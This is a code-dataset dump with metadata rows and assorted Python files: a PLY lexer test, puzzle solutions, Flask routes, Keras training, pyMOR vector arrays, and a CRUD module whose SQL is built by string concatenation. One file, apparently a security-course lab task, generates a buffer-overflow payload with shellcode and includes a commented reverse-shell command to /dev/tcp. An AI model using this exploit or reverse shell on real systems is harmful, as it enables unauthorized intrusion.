hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a0e87849519fc6c4bb8fc7c0be2f724d3b23139
| 601
|
py
|
Python
|
test/lex_state_norule.py
|
pyarnold/ply
|
98bb0e095d72c8aed9de01c15b65fa096c745ce3
|
[
"Unlicense"
] | 1
|
2020-12-18T01:07:42.000Z
|
2020-12-18T01:07:42.000Z
|
test/lex_state_norule.py
|
pyarnold/ply
|
98bb0e095d72c8aed9de01c15b65fa096c745ce3
|
[
"Unlicense"
] | null | null | null |
test/lex_state_norule.py
|
pyarnold/ply
|
98bb0e095d72c8aed9de01c15b65fa096c745ce3
|
[
"Unlicense"
] | null | null | null |
# lex_state_norule.py
#
# Declaration of a state for which no rules are defined
import sys
if ".." not in sys.path:
sys.path.insert(0, "..")
import ply.lex as lex
tokens = [
"PLUS",
"MINUS",
"NUMBER",
]
states = (('comment', 'exclusive'),
('example', 'exclusive'))
t_PLUS = r'\+'
t_MINUS = r'-'
t_NUMBER = r'\d+'
# Comments
def t_comment(t):
r'/\*'
t.lexer.begin('comment')
print("Entering comment state")
def t_comment_body_part(t):
r'(.|\n)*\*/'
print("comment body %s" % t)
t.lexer.begin('INITIAL')
def t_error(t):
pass
lex.lex()
| 13.659091
| 55
| 0.577371
|
4a0e880cebc522a7c347b6febf0631298ea36e5b
| 2,290
|
py
|
Python
|
2019/Day3.py
|
dueyfinster/adventofcode
|
b05c271b0bb7aa6cea8d1039061a96d1a642cb7b
|
[
"MIT"
] | null | null | null |
2019/Day3.py
|
dueyfinster/adventofcode
|
b05c271b0bb7aa6cea8d1039061a96d1a642cb7b
|
[
"MIT"
] | null | null | null |
2019/Day3.py
|
dueyfinster/adventofcode
|
b05c271b0bb7aa6cea8d1039061a96d1a642cb7b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from ngu import read_file
import re
def manhattan_dist(pos):
return abs(pos[0]) + abs(pos[1])
def convert_to_coords(positions, last_pos, pos_to_calculate, distance, crossings, distances):
movement = int(re.sub("R|L|U|D", "", pos_to_calculate))
x, y = last_pos
for _ in range(0, abs(movement)):
if 'R' in pos_to_calculate:
# Calculate positively along X axis
x = x + 1
elif 'L' in pos_to_calculate:
# Calculate negatively along X axis
x = x - 1
elif 'U' in pos_to_calculate:
# Calculate positively along Y axis
y = y + 1
elif 'D' in pos_to_calculate:
# Calculate negatively along Y axis
y = y - 1
new_pos = (x, y)
positions.add(new_pos)
distance = distance + 1
if new_pos in crossings:
distances[new_pos] = distance
return new_pos, distance
def calculate_positions(wire, crossings):
positions = set()
start_pos = (0, 0)
distances = dict()
distance = 0
for pos_to_calc in wire:
curr_pos, distance = convert_to_coords(
positions, start_pos, pos_to_calc, distance, crossings, distances)
start_pos = curr_pos
return positions, distances
def part1(wire1, wire2):
w1_positions, _ = calculate_positions(wire1, {})
w2_positions, _ = calculate_positions(wire2, {})
crossings = w1_positions.intersection(w2_positions)
man_distances = [manhattan_dist(pos) for pos in crossings]
return min(man_distances), crossings
def part2(wire1, wire2, crossings):
lowest_cost_crossing = 0
w1_positions, w1_distances = calculate_positions(wire1, crossings)
w2_positions, w2_distances = calculate_positions(wire2, crossings)
distances = [w1_distances[pos] + w2_distances[pos] for pos in crossings]
lowest_cost_crossing = min(distances)
return lowest_cost_crossing
def main():
content = read_file(3)
wire1 = content[0].split(",")
wire2 = content[1].split(",")
p1_result, crossings = part1(wire1, wire2)
print("Part 1: {}".format(p1_result))
p2_result = part2(wire1, wire2, crossings)
print("Part 2: {}".format(p2_result))
if __name__ == '__main__':
main()
| 28.625
| 93
| 0.646288
|
4a0e887c11bff05cc63fa41b81253f35cd3d4db2
| 845
|
py
|
Python
|
mockapi/test/urls.py
|
AKSharma01/mock_form
|
e21ac891fd0f31be37329351ca1f500b512f6251
|
[
"Apache-2.0"
] | null | null | null |
mockapi/test/urls.py
|
AKSharma01/mock_form
|
e21ac891fd0f31be37329351ca1f500b512f6251
|
[
"Apache-2.0"
] | null | null | null |
mockapi/test/urls.py
|
AKSharma01/mock_form
|
e21ac891fd0f31be37329351ca1f500b512f6251
|
[
"Apache-2.0"
] | null | null | null |
from flask import Flask, request, render_template, url_for
from views import *
app = Flask(__name__)
app.secret_key = "mockapi.dev"
urls = [
('/', ['GET'], Start.as_view('view')),
('/login', ['GET','POST'], Log.as_view('log_alllist')), #- Login into mockapi
('/logout', ['GET'], Logout.as_view('logout')), #- Logout
('/register', ['POST'], Reg.as_view('reg_alllist')), #- Register user to create their mockform
('/mockapi', ['GET','POST'], Dashboard.as_view('dashboard')), # List all the mock API s
('/mockapi/new', ['POST'], CreateForm.as_view('createnewform')), #- New Mock API Form
('/mockapi/edit/<slug>/<version>', ['GET','POST','PUT'], EditJson.as_view('editslug')), #- Edit {{version}}
('/mockapi/<slug>/<version>', ['GET'], ViewJson.as_view('viewmock')) #- View mock apis version wise
]
| 52.8125
| 108
| 0.618935
|
4a0e88ba8dead435285dfd37b907e6397d3138b8
| 183
|
py
|
Python
|
implementations/week3/money_change.py
|
MichelML/edx_algos_micromaster
|
b3e8f3030b2c6c071405d5f6d27d502b4ec177c0
|
[
"MIT"
] | null | null | null |
implementations/week3/money_change.py
|
MichelML/edx_algos_micromaster
|
b3e8f3030b2c6c071405d5f6d27d502b4ec177c0
|
[
"MIT"
] | null | null | null |
implementations/week3/money_change.py
|
MichelML/edx_algos_micromaster
|
b3e8f3030b2c6c071405d5f6d27d502b4ec177c0
|
[
"MIT"
] | null | null | null |
# Uses python3
import sys
def get_change(m):
fives = m % 10
return m // 10 + fives // 5 + fives % 5
if __name__ == '__main__':
m = int(input())
print(get_change(m))
| 18.3
| 44
| 0.579235
|
4a0e88da58c6223a8616883986829b83d18b704e
| 466
|
py
|
Python
|
setup.py
|
omadson/triggercmd-cli
|
52392024cc5f3f00f66207b460ba7296c838964e
|
[
"MIT"
] | 8
|
2021-09-18T11:33:41.000Z
|
2021-10-07T15:39:19.000Z
|
setup.py
|
omadson/triggercmd-cli
|
52392024cc5f3f00f66207b460ba7296c838964e
|
[
"MIT"
] | 5
|
2021-09-22T13:27:59.000Z
|
2021-10-14T14:24:43.000Z
|
setup.py
|
omadson/triggercmd-cli
|
52392024cc5f3f00f66207b460ba7296c838964e
|
[
"MIT"
] | 3
|
2021-09-22T01:46:28.000Z
|
2021-10-13T22:47:11.000Z
|
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
name="triggercmd_cli",
version="0.1.0",
url="https://github.com/GussSoares/triggercmd-cli",
license="MIT License",
author="Gustavo Soares",
author_email="gustavo.soares.cdc@gmail.com",
keywords="triggercmd alexa echo-dot cli archlinux manjaro",
description=u"CLI to TriggerCMD to archlinux distribuction based.",
packages=["triggercmd_cli"],
install_requires=[],
)
| 29.125
| 71
| 0.693133
|
4a0e88db3c70c2762c7a660320dc245a136753ee
| 6,653
|
py
|
Python
|
model/densenet169/model119_val1.py
|
wan-h/JD-AI-Fashion-Challenge
|
817f693672f418745e3a4c89a0417a3165b08130
|
[
"MIT"
] | 3
|
2018-05-06T15:15:21.000Z
|
2018-05-13T12:31:42.000Z
|
model/densenet169/model119_val1.py
|
wan-h/JD-AI-Fashion-Challenge
|
817f693672f418745e3a4c89a0417a3165b08130
|
[
"MIT"
] | null | null | null |
model/densenet169/model119_val1.py
|
wan-h/JD-AI-Fashion-Challenge
|
817f693672f418745e3a4c89a0417a3165b08130
|
[
"MIT"
] | null | null | null |
"""
以model 4为基础,新增real crop
"""
import math
import os
import queue
import time
import keras
from keras.layers import Dense, BatchNormalization, Activation
import config
from util import data_loader
from util import keras_util
from util.keras_util import KerasModelConfig
model_config = KerasModelConfig(k_fold_file="1.txt",
model_path=os.path.abspath(__file__),
image_resolution=344,
data_type=[config.DATA_TYPE_ORIGINAL],
label_position=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],
train_batch_size=[16, 16],
data_visualization=True,
val_batch_size=256,
predict_batch_size=256,
epoch=[2, 6],
lr=[0.0001, 0.00001],
clr=False,
freeze_layers=[0, 0],
input_norm=False)
def get_model(freeze_layers=-1, lr=0.01, output_dim=1, weights="imagenet"):
base_model = keras.applications.DenseNet169(include_top=False, weights=weights,
input_shape=model_config.image_shape, pooling="avg")
x = base_model.output
x = Dense(256, use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation("relu")(x)
predictions = Dense(units=output_dim, activation='sigmoid')(x)
model = keras.Model(inputs=base_model.input, outputs=predictions)
if freeze_layers == -1:
print("freeze all basic layers, lr=%f" % lr)
for layer in base_model.layers:
layer.trainable = False
else:
if freeze_layers < 1:
freeze_layers = math.floor(len(base_model.layers) * freeze_layers)
for layer in range(freeze_layers):
base_model.layers[layer].train_layer = False
print("freeze %d basic layers, lr=%f" % (freeze_layers, lr))
model.compile(loss="binary_crossentropy",
optimizer=keras.optimizers.Adam(lr=lr))
# model.summary()
print("basic model have %d layers" % len(base_model.layers))
return model
def train():
cb = []
evaluate_queue = queue.Queue()
evaluate_task = keras_util.EvaluateTask(evaluate_queue)
evaluate_task.setDaemon(True)
evaluate_task.start()
checkpoint = keras_util.EvaluateCallback(model_config, evaluate_queue)
cb.append(checkpoint)
start = time.time()
model_config.save_log("####### start train model")
init_stage = model_config.get_init_stage()
model_config.save_log("####### init stage is %d" % init_stage)
for i in range(init_stage, len(model_config.epoch)):
model_config.save_log("####### lr=%f, freeze layers=%2f epoch=%d" % (
model_config.lr[i], model_config.freeze_layers[i], model_config.epoch[i]))
if model_config.clr:
clr = keras_util.CyclicLrCallback(base_lr=model_config.lr[i], max_lr=model_config.lr[i] * 5,
step_size=model_config.get_steps_per_epoch(i) / 2)
cb.append(clr)
train_flow = data_loader.KerasGenerator(model_config=model_config) \
.flow_from_files(model_config.train_files,
mode="fit",
target_size=model_config.image_size,
batch_size=
model_config.train_batch_size[i],
shuffle=True,
label_position=model_config.label_position)
if i == 0:
model_config.save_log("####### initial epoch is 0, end epoch is %d" % model_config.epoch[i])
model = get_model(freeze_layers=model_config.freeze_layers[i], lr=model_config.lr[i],
output_dim=len(model_config.label_position))
model.fit_generator(generator=train_flow,
steps_per_epoch=model_config.get_steps_per_epoch(i),
epochs=model_config.epoch[i],
workers=16,
verbose=1,
callbacks=cb)
else:
model = get_model(freeze_layers=model_config.freeze_layers[i], output_dim=len(model_config.label_position),
lr=model_config.lr[i], weights=None)
if i == init_stage:
model_config.save_log(
"####### load weight file: %s" % model_config.get_weights_path(model_config.initial_epoch))
model.load_weights(model_config.get_weights_path(model_config.initial_epoch))
model_config.save_log("####### initial epoch is %d, end epoch is %d" % (
model_config.initial_epoch, model_config.epoch[i]))
model.fit_generator(generator=train_flow,
steps_per_epoch=model_config.get_steps_per_epoch(i),
epochs=model_config.epoch[i],
initial_epoch=model_config.initial_epoch,
workers=16,
verbose=1,
callbacks=cb)
else:
model_config.save_log(
"####### load weight file: %s" % model_config.get_weights_path(model_config.epoch[i - 1]))
model.load_weights(model_config.get_weights_path(model_config.epoch[i - 1]))
model_config.save_log(
"####### initial epoch is %d, end epoch is %d" % (model_config.epoch[i - 1], model_config.epoch[i]))
model.fit_generator(generator=train_flow,
steps_per_epoch=model_config.get_steps_per_epoch(i),
epochs=model_config.epoch[i],
initial_epoch=model_config.epoch[i - 1],
workers=16,
verbose=1,
callbacks=cb)
model_config.save_log("####### train model spend %d seconds" % (time.time() - start))
model_config.save_log(
"####### train model spend %d seconds average" % ((time.time() - start) / model_config.epoch[-1]))
# 等待最后一次预测结束
time.sleep(60)
| 46.852113
| 121
| 0.533444
|
4a0e89cb3339f6b036a20c39f85fd70b71fe0fa3
| 1,880
|
py
|
Python
|
ProgrammingProject2/tasks/task4b.py
|
samuelmmorse/MGSsecurity
|
425621afca366244cdcdc5b991538a618d45fd12
|
[
"Apache-2.0"
] | null | null | null |
ProgrammingProject2/tasks/task4b.py
|
samuelmmorse/MGSsecurity
|
425621afca366244cdcdc5b991538a618d45fd12
|
[
"Apache-2.0"
] | null | null | null |
ProgrammingProject2/tasks/task4b.py
|
samuelmmorse/MGSsecurity
|
425621afca366244cdcdc5b991538a618d45fd12
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
import sys
shellcode= (
"\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
"\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
"\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
"/bin/bash*"
"-c*"
# You can modify the following command string to run any command.
# You can even run multiple commands. When you change the string,
# make sure that the position of the * at the end doesn't change.
# The code above will change the byte at this position to zero,
# so the command string ends here.
# You can delete/add spaces, if needed, to keep the position the same.
# The * in this line serves as the position marker *
#"/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1 *"
"echo 'Hi! You have been hacked :(' *"
"AAAA" # Placeholder for argv[0] --> "/bin/bash"
"BBBB" # Placeholder for argv[1] --> "-c"
"CCCC" # Placeholder for argv[2] --> the command string
"DDDD" # Placeholder for argv[3] --> NULL
).encode('latin-1')
# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
##################################################################
# Put the shellcode somewhere in the payload
start = 517 - len(shellcode) # Change this number
content[start:start + len(shellcode)] = shellcode
# Address of the start of the buffer
buffer = 0xffffd2c8
# point to the beginning of our NOP's, it will catch the shellcode
ret = buffer + 300
# add 75 return addresses to the buffer (to fill the potential range)
ret_splash = 75
for offset in range(ret_splash):
content[offset*4:offset*4 + 4] = (ret).to_bytes(4,byteorder='little')
##################################################################
# Write the content to a file
with open('badfile', 'wb') as f:
f.write(content)
| 37.6
| 74
| 0.612234
|
4a0e8b034a0f6ac8cce9ab1dd9999ff83d81e3cf
| 8,576
|
py
|
Python
|
src/pymor/vectorarrays/block.py
|
lbalicki/pymor
|
8de5f16499b95a48c6332449677540383548dc3e
|
[
"Unlicense"
] | null | null | null |
src/pymor/vectorarrays/block.py
|
lbalicki/pymor
|
8de5f16499b95a48c6332449677540383548dc3e
|
[
"Unlicense"
] | null | null | null |
src/pymor/vectorarrays/block.py
|
lbalicki/pymor
|
8de5f16499b95a48c6332449677540383548dc3e
|
[
"Unlicense"
] | 1
|
2021-03-03T15:18:24.000Z
|
2021-03-03T15:18:24.000Z
|
# This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2019 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
from functools import reduce
from numbers import Number
import numpy as np
from pymor.core.interfaces import classinstancemethod
from pymor.vectorarrays.interfaces import VectorArrayInterface, VectorSpaceInterface
class BlockVectorArray(VectorArrayInterface):
"""|VectorArray| where each vector is a direct sum of sub-vectors.
Given a list of equal length |VectorArrays| `blocks`, this |VectorArray|
represents the direct sums of the vectors contained in the arrays.
The associated |VectorSpace| is :class:`BlockVectorSpace`.
:class:`BlockVectorArray` can be used in conjunction with
:class:`~pymor.operators.block.BlockOperator`.
"""
def __init__(self, blocks, space):
self._blocks = tuple(blocks)
self.space = space
assert self._blocks_are_valid()
def to_numpy(self, ensure_copy=False):
return np.hstack([block.to_numpy() for block in self._blocks])
@property
def real(self):
return BlockVectorArray([block.real for block in self._blocks], self.space)
@property
def imag(self):
return BlockVectorArray([block.imag for block in self._blocks], self.space)
def conj(self):
return BlockVectorArray([block.conj() for block in self._blocks], self.space)
def block(self, ind):
"""
Returns a copy of each block (no slicing).
"""
assert self._blocks_are_valid()
if isinstance(ind, (tuple, list)):
assert all(isinstance(ii, Number) for ii in ind)
return tuple(self._blocks[ii].copy() for ii in ind)
else:
assert isinstance(ind, Number)
return self._blocks[ind].copy()
@property
def num_blocks(self):
return len(self._blocks)
def __len__(self):
return len(self._blocks[0])
def __getitem__(self, ind):
return BlockVectorArrayView(self, ind)
def __delitem__(self, ind):
assert self.check_ind(ind)
for block in self._blocks:
del block[ind]
def append(self, other, remove_from_other=False):
assert self._blocks_are_valid()
assert other in self.space
for block, other_block in zip(self._blocks, other._blocks):
block.append(other_block, remove_from_other=remove_from_other)
def copy(self, deep=False):
return BlockVectorArray([block.copy(deep) for block in self._blocks], self.space)
def scal(self, alpha):
for block in self._blocks:
block.scal(alpha)
def axpy(self, alpha, x):
assert x in self.space
assert isinstance(alpha, Number) \
or isinstance(alpha, np.ndarray) and alpha.shape == (len(self),)
if len(x) > 0:
for block, x_block in zip(self._blocks, x._blocks):
block.axpy(alpha, x_block)
else:
assert len(self) == 0
def dot(self, other):
assert other in self.space
dots = [block.dot(other_block) for block, other_block in zip(self._blocks, other._blocks)]
assert all([dot.shape == dots[0].shape for dot in dots])
common_dtype = reduce(np.promote_types, (dot.dtype for dot in dots))
ret = np.zeros(dots[0].shape, dtype=common_dtype)
for dot in dots:
ret += dot
return ret
def pairwise_dot(self, other):
assert other in self.space
dots = [block.pairwise_dot(other_block)
for block, other_block in zip(self._blocks, other._blocks)]
assert all([dot.shape == dots[0].shape for dot in dots])
common_dtype = reduce(np.promote_types, (dot.dtype for dot in dots))
ret = np.zeros(dots[0].shape, dtype=common_dtype)
for dot in dots:
ret += dot
return ret
def lincomb(self, coefficients):
lincombs = [block.lincomb(coefficients) for block in self._blocks]
return BlockVectorArray(lincombs, self.space)
def l1_norm(self):
return np.sum(np.array([block.l1_norm() for block in self._blocks]), axis=0)
def l2_norm(self):
return np.sqrt(np.sum(np.array([block.l2_norm2() for block in self._blocks]), axis=0))
def l2_norm2(self):
return np.sum(np.array([block.l2_norm2() for block in self._blocks]), axis=0)
def sup_norm(self):
return np.max(np.array([block.sup_norm() for block in self._blocks]), axis=0)
def dofs(self, dof_indices):
dof_indices = np.array(dof_indices)
if not len(dof_indices):
return np.zeros((len(self), 0))
self._compute_bins()
block_inds = np.digitize(dof_indices, self._bins) - 1
dof_indices -= self._bins[block_inds]
block_inds = self._bin_map[block_inds]
blocks = self._blocks
return np.array([blocks[bi].dofs([ci])[:, 0]
for bi, ci in zip(block_inds, dof_indices)]).T
def amax(self):
self._compute_bins()
blocks = self._blocks
inds, vals = zip(*(blocks[bi].amax() for bi in self._bin_map))
inds, vals = np.array(inds), np.array(vals)
inds += self._bins[:-1][..., np.newaxis]
block_inds = np.argmax(vals, axis=0)
ar = np.arange(inds.shape[1])
return inds[block_inds, ar], vals[block_inds, ar]
def _blocks_are_valid(self):
return all([len(block) == len(self._blocks[0]) for block in self._blocks])
def _compute_bins(self):
if not hasattr(self, '_bins'):
dims = np.array([subspace.dim for subspace in self.space.subspaces])
self._bin_map = bin_map = np.where(dims > 0)[0]
self._bins = np.cumsum(np.hstack(([0], dims[bin_map])))
class BlockVectorSpace(VectorSpaceInterface):
"""|VectorSpace| of :class:`BlockVectorArrays <BlockVectorArray>`.
A :class:`BlockVectorSpace` is defined by the |VectorSpaces| of the
individual subblocks which constitute a given array. In particular
for a given :class`BlockVectorArray` `U`, we have the identity ::
(U.blocks[0].space, U.blocks[1].space, ..., U.blocks[-1].space) == U.space.
Parameters
----------
subspaces
The tuple defined above.
"""
def __init__(self, subspaces):
subspaces = tuple(subspaces)
assert all([isinstance(subspace, VectorSpaceInterface) for subspace in subspaces])
self.subspaces = subspaces
def __eq__(self, other):
return (type(other) is BlockVectorSpace
and len(self.subspaces) == len(other.subspaces)
and all(space == other_space for space, other_space in zip(self.subspaces, other.subspaces)))
def __hash__(self):
return sum(hash(s) for s in self.subspaces)
@property
def dim(self):
return sum(subspace.dim for subspace in self.subspaces)
def zeros(self, count=1, reserve=0):
return BlockVectorArray([subspace.zeros(count=count, reserve=reserve) for subspace in self.subspaces], self)
@classinstancemethod
def make_array(cls, obj):
assert len(obj) > 0
return cls(tuple(o.space for o in obj)).make_array(obj)
@make_array.instancemethod
def make_array(self, obj):
assert len(obj) == len(self.subspaces)
assert all(block in subspace for block, subspace in zip(obj, self.subspaces))
return BlockVectorArray(obj, self)
def make_block_diagonal_array(self, obj):
assert len(obj) == len(self.subspaces)
assert all(block in subspace for block, subspace in zip(obj, self.subspaces))
U = self.empty(reserve=sum(len(UU) for UU in obj))
for i, UU in enumerate(obj):
U.append(self.make_array([s.zeros(len(UU)) if j != i else UU for j, s in enumerate(self.subspaces)]))
return U
def from_numpy(self, data, ensure_copy=False):
if data.ndim == 1:
data = data.reshape(1, -1)
data_ind = np.cumsum([0] + [subspace.dim for subspace in self.subspaces])
return BlockVectorArray([subspace.from_numpy(data[:, data_ind[i]:data_ind[i + 1]], ensure_copy=ensure_copy)
for i, subspace in enumerate(self.subspaces)], self)
class BlockVectorArrayView(BlockVectorArray):
is_view = True
def __init__(self, base, ind):
self._blocks = tuple(block[ind] for block in base._blocks)
self.space = base.space
| 36.965517
| 116
| 0.642024
|
4a0e8b07fe4418fb909aa16142e980e3c9484174
| 326
|
py
|
Python
|
settings.dist.py
|
uguratar/pyzico
|
b779d590b99392df60db7c5e2df832708df9b6a2
|
[
"MIT"
] | 6
|
2015-05-03T10:48:54.000Z
|
2018-03-06T12:36:02.000Z
|
settings.dist.py
|
uguratar/pyzico
|
b779d590b99392df60db7c5e2df832708df9b6a2
|
[
"MIT"
] | 1
|
2021-06-01T22:06:45.000Z
|
2021-06-01T22:06:45.000Z
|
settings.dist.py
|
uguratar/pyzico
|
b779d590b99392df60db7c5e2df832708df9b6a2
|
[
"MIT"
] | null | null | null |
url = "https://iyziconnect.com/post/v1/"
delete_card_url = "https://iyziconnect.com/delete-card/v1/"
register_card_url = "https://iyziconnect.com/register-card/v1/"
bin_check_url = "https://api.iyzico.com/bin-check"
installment_url = "https://iyziconnect.com/installment/v1/"
api_id = ""
api_secret = ""
mode = "test" # live
| 36.222222
| 63
| 0.726994
|
4a0e8b7da03b385c235bea5dd25866ac313be6eb
| 5,476
|
py
|
Python
|
at_tmp/model/FUNC/RQMT_OPT.py
|
zuoleilei3253/zuoleilei
|
e188b15a0aa4a9fde00dba15e8300e4b87973e2d
|
[
"Apache-2.0"
] | null | null | null |
at_tmp/model/FUNC/RQMT_OPT.py
|
zuoleilei3253/zuoleilei
|
e188b15a0aa4a9fde00dba15e8300e4b87973e2d
|
[
"Apache-2.0"
] | null | null | null |
at_tmp/model/FUNC/RQMT_OPT.py
|
zuoleilei3253/zuoleilei
|
e188b15a0aa4a9fde00dba15e8300e4b87973e2d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/7/16 17:11
# @Author : bxf
# @File : RQMT_OPT.py
# @Software: PyCharm
from model.util.TMP_PAGINATOR import *
from model.util.PUB_RESP import *
from model.util.newID import *
class RQMT_OPT:
def get_lists(self, data,token):
'''
获取需求列表
:return:
'''
try:
page = data.get('_page')
records = data.get('_limit')
group_id=data.get('group_id')
sql = 'SELECT * FROM t_requirements_info WHERE'
rqmt_lists = GET_RECORDS(sql, page, records,group_id=group_id,token=token)
return_data = respdata().sucessResp(rqmt_lists)
return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
except Exception as e:
return_data = respdata().exceptionResp(e)
return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
def insert(self, data):
'''
新增
:param data: 新增数据
:return:
'''
try:
rqmt_id=newID().RQMT_ID()
get_data=json.loads(data)
rqmt_dever=get_data['rqmt_dever']
rqmt_tester=get_data['rqmt_tester']
rqmt_desc=get_data['rqmt_desc']
group_id =getCode(get_data['group_id'])
rqmt_end_date=get_data['rqmt_end_date']
rqmt_begin_date = get_data['rqmt_begin_date']
rqmt_status = get_data['rqmt_status']
sql='INSERT INTO t_requirements_info (rqmt_dever, rqmt_tester, rqmt_desc, rqmt_end_date, rqmt_id,group_id,rqmt_begin_date,rqmt_status) VALUE(%s,%s,%s,%s,%s,%s,%s,%s)'
params=(rqmt_dever, rqmt_tester, rqmt_desc, rqmt_end_date, rqmt_id,group_id,rqmt_begin_date,rqmt_status)
insert_result = DB_CONN().db_Insert(sql,params)
# insert_result=insertToDatabase('t_requirements_info',get_data,rqmt_id=rqmt_id)
return_data = respdata().sucessMessage('', '新增成功,新增记录数为: ' + str(insert_result))
return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
except Exception as e:
return_data = respdata().failMessage('','新增失败,请检查!错误信息为:'+str(e))
return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
def update(self, data):
'''
修改
:param data:
:return:
'''
try:
get_data=json.loads(data)
rqmt_id = get_data['rqmt_id']
update_result = updateToDatabase('t_requirements_info', get_data, rqmt_id=rqmt_id)
return_data = respdata().sucessMessage('', '更新成功,更新条数:'+str(update_result))
return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
except Exception as e:
return_data = respdata().failMessage('', '更新失败,请检查!错误信息为:' + str(e))
return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
def delete(self, rqmt_id):
'''
删除
:param data:
:return:
'''
sql = 'DELETE A,B FROM t_requirements_info A LEFT JOIN rqmt_case_info B ON A.rqmt_id=B.rqmt_id WHERE A.rqmt_id="' + rqmt_id + '"'
DB_CONN().db_Update(sql)
return_data = respdata().sucessMessage('', '删除成功!')
return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
def rqmtToregress (self,data):
rqmt_id=json.loads(data)['rqmt_id']
counts = int()
try:
rqmt_case_sql="SELECT * FROM rqmt_case_info WHERE rqmt_id= '"+rqmt_id+"'"
rqmt_case=getJsonFromDatabase(rqmt_case_sql)
if rqmt_case:
rqmt_case=rqmt_case
else:
rqmt_case=[]
return_data = respdata().failMessage('', '同步失败~~未获取到该需求下的用例,请检查是否有用例存在!~')
return json.dumps(return_data, ensure_ascii=False)
case_list =[]
case_list_no_group_id =[]
for i in rqmt_case:
if i.get('group_id') == None or i.get('group_id') == '':
case_list_no_group_id.append(i.get('case_id'))
else:
del i['adddate']
case_list.append(i)
if case_list_no_group_id !=[]:
return_data=respdata().failMessage('','同步失败,用例中存在未分组用例,清单如下:【'+str(case_list_no_group_id)+'】,请修改添加分组后提交')
return json.dumps(return_data,ensure_ascii=False)
else:
for j in case_list:
case_id = j.get('case_id')
selectsql = "SELECT * FROM regress_case_info WHERE case_id='%s'" % ( case_id)
count = DB_CONN().db_Update(selectsql)
if count > 0:
update_counts = updateToDatabase('regress_case_info', j,case_id=case_id)
counts=counts+update_counts
else:
insert_counts =insertToDatabase('regress_case_info', j)
counts = counts + insert_counts
return_data=respdata().sucessMessage('','同步成功,!~~请确认!~')
return json.dumps(return_data,ensure_ascii=False)
except Exception as e:
return_data = respdata().failMessage('', '同步失败~~异常信息为~'+str(e))
return json.dumps(return_data, ensure_ascii=False)
| 43.808
| 179
| 0.570489
|
4a0e8b875254803e78ddfd75c2193811476d9d21
| 4,477
|
py
|
Python
|
agpy/mpfit/oldtests/mpfit_vs_scipy.py
|
keflavich/agpy
|
fb3a42d9909b7cd1ba74247530bcc8742f5aaeb1
|
[
"MIT"
] | 16
|
2015-05-08T11:14:26.000Z
|
2021-11-19T19:05:16.000Z
|
agpy/mpfit/oldtests/mpfit_vs_scipy.py
|
keflavich/agpy
|
fb3a42d9909b7cd1ba74247530bcc8742f5aaeb1
|
[
"MIT"
] | 3
|
2016-05-12T16:27:14.000Z
|
2020-12-27T01:14:24.000Z
|
agpy/mpfit/oldtests/mpfit_vs_scipy.py
|
keflavich/agpy
|
fb3a42d9909b7cd1ba74247530bcc8742f5aaeb1
|
[
"MIT"
] | 19
|
2015-03-30T22:34:14.000Z
|
2020-11-25T23:29:53.000Z
|
"""
Compare speed and fit quality for a few cases using mpfit and scipy.optimize.leastsq
"""
from agpy.mpfit import mpfit
from agpy.timer import print_timing
from scipy.optimize import leastsq
import scipy.optimize
import numpy as np
import timeit
def gaussian(x,A,dx,w, return_components=False):
"""
Returns a 1-dimensional gaussian of form
H+A*numpy.exp(-(x-dx)**2/(2*w**2))
[height,amplitude,center,width]
return_components does nothing but is required by all fitters
"""
x = np.array(x) # make sure xarr is no longer a spectroscopic axis
return A*np.exp(-(x-dx)**2/(2.0*w**2))
def error_function_generator(xdata, ydata, error=None, model=gaussian, mpfit=False, sumsquares=False, **kwargs):
"""
Return a function that generates the errors given input parameters
"""
if error is None:
error = np.ones(ydata.shape)
def error_function(params, **kwargs):
err = (ydata - model(xdata, *params)) / error
if sumsquares:
return (err**2).sum()
elif mpfit:
return [0,err]
else:
return err
return error_function
